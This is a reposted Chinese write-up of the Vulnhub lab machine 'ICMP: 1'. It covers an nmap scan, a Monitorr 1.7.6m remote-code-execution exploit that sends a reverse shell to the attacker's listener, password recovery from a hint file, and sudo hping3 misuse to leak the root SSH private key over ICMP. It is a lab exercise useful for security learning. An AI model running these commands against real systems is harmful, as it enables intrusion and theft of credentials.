当前位置: 首页 > news >正文

Vulnhub: ICMP: 1靶机

news 2025/9/2 17:41:23

kali:192.168.111.111

靶机:192.168.111.208

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.208

80端口的cms为Monitorr 1.7.6m

搜索发现该版本的cms存在远程代码执行

searchsploit monitorr

漏洞利用

nc本地监听,再执行exp

python3 48980.py http://192.168.111.208/mon/ 192.168.111.111 4444

提权

在fox用户家目录查看reminder提示crypt.php

crypt.phpdevel目录中

BUHNIJMONIBUVCYTTYVGBUHJNI为fox用户的密码

fox用户sudo权限

开启两个终端连接目标ssh,利用hping3读取root用户的私钥文件

#发送端
sudo -u root hping3 --icmp 127.0.0.1 --data 5000 --sign signature --file /root/.ssh/id_rsa
​
#接收端
sudo -u root hping3 --icmp 127.0.0.1 --listen signature --safe

读取到的私钥保存到本地,再利用私钥登录root

http://www.lryc.cn/news/133741.html

相关文章:

  • 我的创作纪念日(C++修仙练气期总结)
  • css的常见伪元素使用
  • 91. 解码方法
  • docker搭建opengrok环境2
  • 【校招VIP】java语言考点之ConcurrentHashMap1.7和1.8
  • php如何实现5x+2x+1x=100
  • 机器人项目:从 ROS2 切换到 ROS1 的原因
  • Vault主题 - UiCore多用途Elementor WordPress主题
  • G0第26章:微服务概述与gRPCprotocol buffers
  • 三款远程控制软件对比,5大挑选指标:安全、稳定、易用、兼容、功能
  • Java中static的应用之单例模式
  • TypeError: Cannot read properties of undefined (reading ‘container‘)
  • Vue--BM记事本
  • openpnp - 板子上最小物料封装尺寸的选择
  • 什么是非功能性需求,它们如何影响产品开发?
  • Oracle jdk8 exe->zip
  • Android 命令行如何运行 JAR 文件
  • 5.4 webrtc的线程
  • vscode | linux | c++ intelliense 被弃用解决方案
  • HPE服务器常见报错信息以及解决方案
  • 尚硅谷宋红康MySQL笔记 3-9
  • Leetcode.2337 移动片段得到字符串
  • 【vue】更改角色权限后,实现页面不刷新更改其可展示的导航菜单
  • 【G-LAB】网络工程师常用排错命令详细版
  • Linux 桌面版关闭GUI桌面环境
  • ChatGPT能代替搜索引擎吗?ChatGPT和搜索引擎有什么区别?
  • PHP海外代购管理系统mysql数据库web结构apache计算机软件工程网页wamp
  • 游戏反外挂方案解析
  • 基于郊狼算法优化的BP神经网络(预测应用) - 附代码
  • 【腾讯云 TDSQL-C Serverless 产品测评】全面测评TDSQL-C Mysql Serverless